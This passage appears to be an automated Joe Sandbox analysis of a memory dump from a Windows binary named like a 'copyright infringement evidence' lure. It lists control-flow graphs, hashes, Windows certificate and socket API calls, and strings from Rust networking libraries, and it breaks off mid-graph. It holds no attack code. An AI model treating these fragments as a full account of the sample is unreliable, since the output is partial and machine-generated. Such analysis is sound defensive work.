                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: bind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187836755-0
                                                                                                          • Opcode ID: d7eb64fc8366ee6320b74350706ce627f621685b3cc2b2f5301c6c4e4dd5a8d2
                                                                                                          • Instruction ID: 1e33d2e5966ff38fed2c90bc822dd5826fc9ca3c7f07d208de8ab0e0808639a5
                                                                                                          • Opcode Fuzzy Hash: d7eb64fc8366ee6320b74350706ce627f621685b3cc2b2f5301c6c4e4dd5a8d2
                                                                                                          • Instruction Fuzzy Hash: 24D0C755F2654182FB547B63988226552507B5CB50FD944B0C54C82361DD5DD5F58F20

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 7ff7a1801df0-7ff7a1801e4c 1 7ff7a1801e54-7ff7a1801e5e 0->1 2 7ff7a1801e64-7ff7a1801e95 1->2 3 7ff7a1802e97-7ff7a1802e9a 1->3 6 7ff7a1801eb0-7ff7a1801eb5 2->6 7 7ff7a1801e97-7ff7a1801e9a 2->7 4 7ff7a1802ebd-7ff7a1802ec4 3->4 5 7ff7a1802e9c-7ff7a1802ebb 3->5 9 7ff7a1802e79-7ff7a1802e96 4->9 5->9 8 7ff7a1801ec0-7ff7a1801ec6 6->8 10 7ff7a1801f30-7ff7a1801f35 7->10 11 7ff7a1801ea0 7->11 12 7ff7a1802fa4-7ff7a1802fc5 8->12 13 7ff7a1801ecc-7ff7a1801ed3 8->13 14 7ff7a1802f8c-7ff7a1802f9f call 7ff7a18d9030 10->14 15 7ff7a1801f3b-7ff7a1801f43 10->15 16 7ff7a1801f45-7ff7a1801f48 11->16 52 7ff7a1802fd1-7ff7a1802fd8 12->52 13->14 17 7ff7a1801ed9-7ff7a1801eeb call 7ff7a186ff20 13->17 14->12 15->16 19 7ff7a1801f4c-7ff7a1801f57 15->19 16->19 20 7ff7a1801f67-7ff7a1801f6a 16->20 27 7ff7a1801ef0-7ff7a1801ef3 17->27 19->20 23 7ff7a1801f59-7ff7a1801f61 19->23 24 7ff7a18028b2-7ff7a18028b7 20->24 25 7ff7a1801f70-7ff7a1802102 call 7ff7a178c640 20->25 23->20 29 7ff7a180256d-7ff7a1802575 call 7ff7a181a6f0 23->29 28 7ff7a180293f-7ff7a180294a 24->28 44 7ff7a1802fe0-7ff7a1802fe5 25->44 45 7ff7a1802108-7ff7a1802117 25->45 31 7ff7a1802e59-7ff7a1802e67 27->31 32 7ff7a1801ef9-7ff7a1801f10 27->32 35 7ff7a1802a2e-7ff7a1802adb CertGetCertificateChain 28->35 36 7ff7a18029c7 call 7ff7a181af60 28->36 42 7ff7a180257a-7ff7a180257d 29->42 38 7ff7a1802e6b 31->38 32->8 41 7ff7a1801f12-7ff7a1801f18 32->41 39 7ff7a1802f31-7ff7a1802f41 call 7ff7a18ab130 35->39 40 7ff7a1802ae1-7ff7a1802d65 CertVerifyCertificateChainPolicy 35->40 53 7ff7a18029cc-7ff7a18029d5 36->53 46 7ff7a1802e70 38->46 71 7ff7a1802f60-7ff7a1802f75 call 7ff7a181a1c0 39->71 77 7ff7a1802f43 call 7ff7a18ab130 40->77 78 7ff7a1802d6b-7ff7a1802df1 40->78 41->7 48 7ff7a1801f1e-7ff7a1801f26 41->48 49 7ff7a18025ef-7ff7a1802601 42->49 50 7ff7a1802699-7ff7a18026a9 42->50 66 7ff7a1802fef-7ff7a1802ffd 44->66 45->52 54 7ff7a180211d-7ff7a1802291 call 7ff7a181acc0 45->54 55 7ff7a1802e74 46->55 48->10 57 7ff7a1801f28 48->57 58 7ff7a18024dc-7ff7a18024de 49->58 59 7ff7a180261c-7ff7a1802624 49->59 50->38 60 7ff7a18026af-7ff7a18026dc call 7ff7a181a1e0 50->60 52->44 62 7ff7a18029e4-7ff7a18029ef 53->62 63 7ff7a18029d7-7ff7a18029df call 7ff7a181aca0 53->63 99 7ff7a1802313-7ff7a1802332 FreeContextBuffer 54->99 100 7ff7a18023df-7ff7a180248f InitializeSecurityContextW 54->100 55->9 57->10 58->59 59->66 69 7ff7a180262a 59->69 60->28 79 7ff7a18027b4-7ff7a1802839 60->79 64 7ff7a18029f1-7ff7a1802a03 call 7ff7a178c650 62->64 65 7ff7a1802a08-7ff7a1802a0d 62->65 63->62 64->65 65->1 75 7ff7a1802a13-7ff7a1802ecf 65->75 83 7ff7a1803007-7ff7a180301f 66->83 69->79 80 7ff7a180266f-7ff7a1802676 69->80 71->46 75->55 92 7ff7a1802f48-7ff7a1802f5b call 7ff7a181a250 77->92 78->92 93 7ff7a1802df7-7ff7a1802e19 call 7ff7a181a250 call 7ff7a181a1c0 78->93 89 7ff7a1802881-7ff7a1802889 79->89 90 7ff7a180283b-7ff7a1802846 call 7ff7a1803360 79->90 80->53 106 7ff7a1803029-7ff7a1803049 83->106 96 7ff7a1802893-7ff7a1802896 89->96 97 7ff7a180288b 89->97 90->89 92->71 93->20 115 7ff7a1802e1f-7ff7a1802e2a 93->115 96->53 102 7ff7a180289c-7ff7a18028a2 96->102 97->96 108 7ff7a18024e3-7ff7a18024ef 99->108 109 7ff7a1802338-7ff7a180233a 99->109 100->99 110 7ff7a180249a-7ff7a18024a6 100->110 102->53 107 7ff7a18028a8-7ff7a18028ad 102->107 107->36 108->83 112 7ff7a18024f5-7ff7a1802506 108->112 109->100 109->110 110->106 113 7ff7a18024ac-7ff7a18024b8 110->113 112->80 116 7ff7a180250c-7ff7a1802516 112->116 113->49 113->58 115->20 116->53
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $1.3.6.1.4.1.311.10.3.3$1.3.6.1.5.5.7.3.1$2.16.840.1.113730.4.1$assertion failed: !self.context.is_null()$assertion failed: size >= nread
                                                                                                          • API String ID: 0-2495497086
                                                                                                          • Opcode ID: 403eee1e85450ee494a6ca9f4f361c0e52a5e2c8e381eb76f4590b846c34296e
                                                                                                          • Instruction ID: 51b4232ac89d5aee481974bdc53bfd84d052e0acc480a0962460f23dc60e72f1
                                                                                                          • Opcode Fuzzy Hash: 403eee1e85450ee494a6ca9f4f361c0e52a5e2c8e381eb76f4590b846c34296e
                                                                                                          • Instruction Fuzzy Hash: 0C22827290ABC585FB61AB10E4443EAB3E5FB847A4F864175DA8C037A5DFBCD464CB20

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 119 7ff7a1796720-7ff7a179675d 121 7ff7a1796763-7ff7a1796772 call 7ff7a17fd440 119->121 122 7ff7a1796834-7ff7a17968bd call 7ff7a18d9530 call 7ff7a18d8f30 call 7ff7a18d8f90 119->122 121->122 130 7ff7a1796a1f-7ff7a1796a2d 122->130 131 7ff7a17968c3-7ff7a1796970 call 7ff7a1897710 * 6 122->131 133 7ff7a1796a2f-7ff7a1796a35 130->133 134 7ff7a1796a97 130->134 178 7ff7a1796a56-7ff7a1796a6e 131->178 179 7ff7a1796976-7ff7a17969b6 131->179 136 7ff7a1796a99-7ff7a1796aa3 call 7ff7a185fb50 133->136 137 7ff7a1796a37-7ff7a1796a39 133->137 134->136 136->131 146 7ff7a1796aa9-7ff7a1796ab3 136->146 137->131 138 7ff7a1796a3f-7ff7a1796a4f call 7ff7a18d2b40 137->138 138->136 147 7ff7a1796a51 138->147 149 7ff7a1796b93-7ff7a1796beb call 7ff7a18d8f30 memmove 146->149 150 7ff7a1796ab9-7ff7a1796b86 call 7ff7a1860270 146->150 147->131 158 7ff7a1796bf1-7ff7a1796bf4 149->158 159 7ff7a1796c74 149->159 150->131 161 7ff7a1796bf6-7ff7a1796bf9 call 7ff7a17cb080 158->161 162 7ff7a1796bfe-7ff7a1796c38 memmove 158->162 163 7ff7a1796d01-7ff7a1796d3a call 7ff7a18d9030 159->163 164 7ff7a1796c7a-7ff7a1796c89 159->164 161->162 168 7ff7a1796cc6-7ff7a1796cd1 162->168 169 7ff7a1796c3e-7ff7a1796c41 162->169 181 7ff7a1796d40-7ff7a1796d4e 163->181 182 7ff7a1796dc8-7ff7a1796dcb 163->182 164->163 170 7ff7a1796c8b-7ff7a1796cc0 call 7ff7a17bae50 memmove 164->170 173 7ff7a1796cd5-7ff7a1796ce8 168->173 175 7ff7a1796c47-7ff7a1796c56 169->175 176 7ff7a1796ce9-7ff7a1796cfc call 7ff7a18cdba0 169->176 170->168 170->169 175->176 183 7ff7a1796c5c-7ff7a1796c72 175->183 176->163 184 7ff7a1796a73 178->184 179->184 194 7ff7a17969bc-7ff7a17969cf 179->194 185 7ff7a1796e40-7ff7a1796e53 call 7ff7a18d8f30 181->185 186 7ff7a1796d54-7ff7a1796da5 memmove 181->186 187 7ff7a1796df9-7ff7a1796e0f 182->187 183->173 188 7ff7a1796a78-7ff7a1796a96 184->188 195 7ff7a1796e58-7ff7a1796e6b call 7ff7a18d9030 185->195 191 7ff7a1796e10-7ff7a1796e3b call 7ff7a17bae50 memmove 186->191 192 7ff7a1796da7-7ff7a1796db4 186->192 191->185 196 7ff7a1796db6-7ff7a1796db9 192->196 197 7ff7a1796dcd-7ff7a1796dd0 192->197 202 7ff7a17969d1-7ff7a17969df call 7ff7a18972b0 194->202 203 7ff7a17969e3-7ff7a17969ff memmove 194->203 198 7ff7a1796e70-7ff7a1796e7f call 7ff7a18d8f10 195->198 196->195 205 7ff7a1796dbf-7ff7a1796dc6 196->205 197->198 199 7ff7a1796dd6-7ff7a1796de2 197->199 206 7ff7a1796de6-7ff7a1796df4 memmove 199->206 202->203 209 7ff7a1796a05-7ff7a1796a1d 203->209 210 7ff7a1796b8b-7ff7a1796b8e call 7ff7a18d6eb0 203->210 205->206 206->187 209->188 210->149
                                                                                                          Strings
                                                                                                          • filled overflowIdleBusyDisabledInit, xrefs: 00007FF7A1796846
                                                                                                          • invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code, xrefs: 00007FF7A1796CE9, 00007FF7A1796E40
                                                                                                          • assertion failed: slot.next.is_none(), xrefs: 00007FF7A1796E58
                                                                                                          • FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\go_away.rs, xrefs: 00007FF7A1796B93
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\go_away.rs$assertion failed: slot.next.is_none()$filled overflowIdleBusyDisabledInit$invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code
                                                                                                          • API String ID: 0-1173865434
                                                                                                          • Opcode ID: 2865873cfe5e35f71f7c23b6824436effe35a28e509e7ca0746786e91a58cd25
                                                                                                          • Instruction ID: 9758cf359cec4e06667636108ddfd76f3dfe0ff6af592eb829193e4e8ed424ec
                                                                                                          • Opcode Fuzzy Hash: 2865873cfe5e35f71f7c23b6824436effe35a28e509e7ca0746786e91a58cd25
                                                                                                          • Instruction Fuzzy Hash: 1F02C332A1AB8181FB60EF11E4407A9B3A0FB89794F814131EE9C07BA5DFBCE155CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrngProcess$Openmemmove
                                                                                                          • String ID: HTTPS_PROXYhttps_proxyALL_PROXYall_proxyREQUEST_METHODSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsProxyEnableProxyServer=;$httphttpsNO_PROXYno_proxyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\reqwest-0.11.27\src\proxy.rsunknown proxy scheme
                                                                                                          • API String ID: 2088936721-2200037009
                                                                                                          • Opcode ID: f8b8856df84ca30b498ff984c1f3900a779d6a2898aa509575eb5244e11e0611
                                                                                                          • Instruction ID: ddd83570bfab1d09b69a20d364f85dd61de4efb0e6b7b99a42d5d126b5557512
                                                                                                          • Opcode Fuzzy Hash: f8b8856df84ca30b498ff984c1f3900a779d6a2898aa509575eb5244e11e0611
                                                                                                          • Instruction Fuzzy Hash: 0082646161E6C280FB60AB15E4443EAE761FF887C4F856031EA8D07BAADFBDD155CB10

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 3114377017-0
                                                                                                          • Opcode ID: d4c18b28e57b82c4dcc571417ebf923218e5f856419ecfe949fc2edb9e62be4b
                                                                                                          • Instruction ID: b6d782a240bbc24b10410553f875ecb78017a6a6388d72c29c935e2221f92ae7
                                                                                                          • Opcode Fuzzy Hash: d4c18b28e57b82c4dcc571417ebf923218e5f856419ecfe949fc2edb9e62be4b
                                                                                                          • Instruction Fuzzy Hash: 8F213831B0A65187F7202B75A804725A260BB887F4FEA0370DD2D437E4DFBD68A58B10

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1033 7ff7a1823af0-7ff7a1823b51 call 7ff7a1874010 1036 7ff7a1823b57-7ff7a1823b70 call 7ff7a178c640 1033->1036 1037 7ff7a1823bdd-7ff7a1823bf1 call 7ff7a1874140 1033->1037 1044 7ff7a182450d-7ff7a1824517 call 7ff7a18d8d20 1036->1044 1045 7ff7a1823b76-7ff7a1823bad call 7ff7a178c640 1036->1045 1042 7ff7a1823c37-7ff7a1823c3f 1037->1042 1043 7ff7a1823bf3-7ff7a1823c14 call 7ff7a178c640 1037->1043 1048 7ff7a1823e1b-7ff7a1823e1e 1042->1048 1049 7ff7a1823c45-7ff7a1823c78 call 7ff7a1874270 1042->1049 1054 7ff7a182451c-7ff7a1824526 call 7ff7a18d8d20 1043->1054 1059 7ff7a1823c1a-7ff7a1823c32 1043->1059 1044->1054 1064 7ff7a18244fe-7ff7a1824508 call 7ff7a18d8d40 1045->1064 1065 7ff7a1823bb3-7ff7a1823bd8 1045->1065 1051 7ff7a1823e48-7ff7a1823e4c 1048->1051 1052 7ff7a1823e20-7ff7a1823e24 1048->1052 1049->1048 1070 7ff7a1823c7e-7ff7a1823c94 1049->1070 1061 7ff7a1823e6b 1051->1061 1062 7ff7a1823e4e-7ff7a1823e63 1051->1062 1057 7ff7a1823e26-7ff7a1823e46 1052->1057 1058 7ff7a1823e65-7ff7a1823e69 1052->1058 1068 7ff7a182452b-7ff7a1824535 call 7ff7a18d8d20 1054->1068 1066 7ff7a1823e7f-7ff7a1823e9c call 7ff7a1873f60 call 7ff7a18740c0 1057->1066 1069 7ff7a1823e6d-7ff7a1823e7a 1058->1069 1067 7ff7a1823ee5-7ff7a1823efe call 7ff7a178c640 1059->1067 1061->1069 1062->1066 1064->1044 1071 7ff7a1823f30-7ff7a1823f44 1065->1071 1095 7ff7a1823ea1-7ff7a1823ea7 1066->1095 1067->1064 1085 7ff7a1823f04-7ff7a1823f2a closesocket 1067->1085 1079 7ff7a182453a-7ff7a182454d call 7ff7a18d8f30 1068->1079 1069->1066 1076 7ff7a1823c9a-7ff7a1823ca4 1070->1076 1077 7ff7a1823dc5-7ff7a1823dd6 1070->1077 1082 7ff7a1823ccd 1076->1082 1083 7ff7a1823ca6-7ff7a1823cac 1076->1083 1077->1048 1080 7ff7a1823dd8-7ff7a1823de7 1077->1080 1092 7ff7a1824552-7ff7a1824565 call 7ff7a18d8f30 1079->1092 1087 7ff7a1823de9 1080->1087 1088 7ff7a1823dee-7ff7a1823df9 1080->1088 1084 7ff7a1823ccf-7ff7a1823cdd call 7ff7a185fb50 1082->1084 1083->1084 1090 7ff7a1823cae-7ff7a1823cb0 1083->1090 1084->1077 1104 7ff7a1823ce3-7ff7a1823cf1 1084->1104 1085->1071 1087->1088 1093 7ff7a1823e08-7ff7a1823e16 call 7ff7a178c650 1088->1093 1094 7ff7a1823dfb-7ff7a1823e03 call 7ff7a178c650 1088->1094 1090->1077 1096 7ff7a1823cb6-7ff7a1823cc6 call 7ff7a18d2b40 1090->1096 1107 7ff7a182456a-7ff7a182457d call 7ff7a18d8f30 1092->1107 1093->1048 1094->1093 1100 7ff7a1823ead-7ff7a1823ecb call 7ff7a178c640 1095->1100 1101 7ff7a1823f45-7ff7a1823f56 1095->1101 1096->1084 1116 7ff7a1823cc8 1096->1116 1100->1068 1119 7ff7a1823ed1-7ff7a1823ede 1100->1119 1105 7ff7a1823f5c-7ff7a1823f6e call 7ff7a1871ad0 1101->1105 1106 7ff7a1824111-7ff7a1824115 1101->1106 1104->1079 1112 7ff7a1823cf7-7ff7a1823dc0 call 7ff7a1860270 1104->1112 1105->1106 1126 7ff7a1823f74-7ff7a1823f87 1105->1126 1110 7ff7a182411b-7ff7a182413f call 7ff7a1871ae0 1106->1110 1111 7ff7a18242e5-7ff7a18242ea 1106->1111 1123 7ff7a1824582-7ff7a18245ac call 7ff7a18d8f30 1107->1123 1110->1111 1129 7ff7a1824145-7ff7a182415b 1110->1129 1117 7ff7a18242f0-7ff7a1824314 call 7ff7a1871af0 1111->1117 1118 7ff7a18244b6-7ff7a18244f2 1111->1118 1112->1077 1116->1077 1117->1118 1133 7ff7a182431a-7ff7a1824330 1117->1133 1118->1064 1119->1067 1130 7ff7a18240be-7ff7a18240cc 1126->1130 1131 7ff7a1823f8d-7ff7a1823f97 1126->1131 1134 7ff7a1824297-7ff7a18242a0 1129->1134 1135 7ff7a1824161-7ff7a182416b 1129->1135 1130->1106 1136 7ff7a18240ce-7ff7a18240dd 1130->1136 1137 7ff7a1823f99-7ff7a1823f9f 1131->1137 1138 7ff7a1823fc0 1131->1138 1140 7ff7a182446c-7ff7a1824474 1133->1140 1141 7ff7a1824336-7ff7a1824340 1133->1141 1134->1111 1142 7ff7a18242a2-7ff7a18242b1 1134->1142 1143 7ff7a182416d-7ff7a1824173 1135->1143 1144 7ff7a1824194 1135->1144 1145 7ff7a18240df 1136->1145 1146 7ff7a18240e4-7ff7a18240ef 1136->1146 1139 7ff7a1823fc2-7ff7a1823fd0 call 7ff7a185fb50 1137->1139 1147 7ff7a1823fa1-7ff7a1823fa3 1137->1147 1138->1139 1139->1130 1176 7ff7a1823fd6-7ff7a1823fe4 1139->1176 1140->1118 1149 7ff7a1824476-7ff7a1824484 1140->1149 1150 7ff7a1824369 1141->1150 1151 7ff7a1824342-7ff7a1824348 1141->1151 1152 7ff7a18242b8-7ff7a18242c3 1142->1152 1153 7ff7a18242b3 1142->1153 1154 7ff7a1824196-7ff7a18241a4 call 7ff7a185fb50 1143->1154 1155 7ff7a1824175-7ff7a1824177 1143->1155 1144->1154 1145->1146 1156 7ff7a18240fe-7ff7a182410c call 7ff7a178c650 1146->1156 1157 7ff7a18240f1-7ff7a18240f9 call 7ff7a178c650 1146->1157 1147->1130 1158 7ff7a1823fa9-7ff7a1823fb9 call 7ff7a18d2b40 1147->1158 1162 7ff7a182448b-7ff7a1824495 1149->1162 1163 7ff7a1824486 1149->1163 1165 7ff7a182436b-7ff7a1824379 call 7ff7a185fb50 1150->1165 1164 7ff7a182434a-7ff7a182434c 1151->1164 1151->1165 1167 7ff7a18242d2-7ff7a18242e0 call 7ff7a178c650 1152->1167 1168 7ff7a18242c5-7ff7a18242cd call 7ff7a178c650 1152->1168 1153->1152 1154->1134 1182 7ff7a18241aa-7ff7a18241b8 1154->1182 1155->1134 1166 7ff7a182417d-7ff7a182418d call 7ff7a18d2b40 1155->1166 1156->1106 1157->1156 1158->1139 1181 7ff7a1823fbb 1158->1181 1177 7ff7a1824497-7ff7a182449e call 7ff7a178c650 1162->1177 1178 7ff7a18244a3-7ff7a18244b1 call 7ff7a178c650 1162->1178 1163->1162 1164->1140 1171 7ff7a1824352-7ff7a1824362 call 7ff7a18d2b40 1164->1171 1165->1140 1191 7ff7a182437f-7ff7a182438d 1165->1191 1166->1154 1190 7ff7a182418f 1166->1190 1167->1111 1168->1167 1171->1165 1196 7ff7a1824364 1171->1196 1176->1092 1183 7ff7a1823fea-7ff7a18240b9 call 7ff7a1860270 1176->1183 1177->1178 1178->1118 1181->1130 1182->1107 1192 7ff7a18241be-7ff7a1824292 call 7ff7a1860270 1182->1192 1183->1130 1190->1134 1191->1123 1194 7ff7a1824393-7ff7a1824467 call 7ff7a1860270 1191->1194 1192->1134 1194->1140 1196->1140
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Socketclosesocket
                                                                                                          • String ID: FieldSet corrupted (this is a bug)C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.30\src\client\connect\http.rs$en error$rror$tcp open
                                                                                                          • API String ID: 230593038-388136426
                                                                                                          • Opcode ID: ccef88ca702d7b00f0d7219393101adfb9627394f1d2227e93ca022a7a96f82b
                                                                                                          • Instruction ID: 5c1f1f49b1ccaa02d1ac7d6202ab0379ce26ddcecc8adf8dad7f8111c4d80b3c
                                                                                                          • Opcode Fuzzy Hash: ccef88ca702d7b00f0d7219393101adfb9627394f1d2227e93ca022a7a96f82b
                                                                                                          • Instruction Fuzzy Hash: D452A43260EB8181F761AB14E4403AAF3A4FB84754F858175DA9C47BB5EFBDE494CB20

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 947 7ff7a17b9620-7ff7a17b9659 memmove 948 7ff7a17b9677-7ff7a17b9695 memmove call 7ff7a17f66e0 947->948 949 7ff7a17b965b-7ff7a17b9672 call 7ff7a17bc350 947->949 952 7ff7a17b969a-7ff7a17b96ab 948->952 956 7ff7a17b9ad6-7ff7a17b9af2 949->956 954 7ff7a17b96b1-7ff7a17b9727 call 7ff7a17b2f20 call 7ff7a17b6c70 952->954 955 7ff7a17b9896-7ff7a17b98cc 952->955 968 7ff7a17b9756-7ff7a17b9789 954->968 969 7ff7a17b9729-7ff7a17b9751 call 7ff7a178c650 954->969 957 7ff7a17b98d2 955->957 958 7ff7a17b9975-7ff7a17b997d 955->958 960 7ff7a17b996a-7ff7a17b996d 957->960 962 7ff7a17b9980-7ff7a17b9a29 memmove call 7ff7a178c640 958->962 960->958 963 7ff7a17b996f-7ff7a17b9973 960->963 970 7ff7a17b9a2f-7ff7a17b9a66 memmove 962->970 971 7ff7a17b9c33-7ff7a17b9c3d call 7ff7a18d8d40 962->971 963->962 979 7ff7a17b978f-7ff7a17b9797 968->979 980 7ff7a17b9af3-7ff7a17b9af8 968->980 969->968 973 7ff7a17b9a68-7ff7a17b9ad3 970->973 974 7ff7a17b9c42-7ff7a17b9c5a call 7ff7a18d8f30 971->974 973->956 983 7ff7a17b98d7-7ff7a17b9924 979->983 984 7ff7a17b979d-7ff7a17b97c2 call 7ff7a181b970 call 7ff7a17d36b0 979->984 980->979 982 7ff7a17b9afe-7ff7a17b9b0e call 7ff7a178c650 980->982 982->979 985 7ff7a17b9b13-7ff7a17b9b21 983->985 986 7ff7a17b992a-7ff7a17b9968 983->986 999 7ff7a17b97c4-7ff7a17b97d0 984->999 1000 7ff7a17b97ee-7ff7a17b97f7 984->1000 990 7ff7a17b9b23-7ff7a17b9b29 985->990 991 7ff7a17b9b4a 985->991 986->958 986->960 994 7ff7a17b9b4c-7ff7a17b9b56 call 7ff7a185fb50 990->994 995 7ff7a17b9b2b-7ff7a17b9b2d 990->995 991->994 994->986 1008 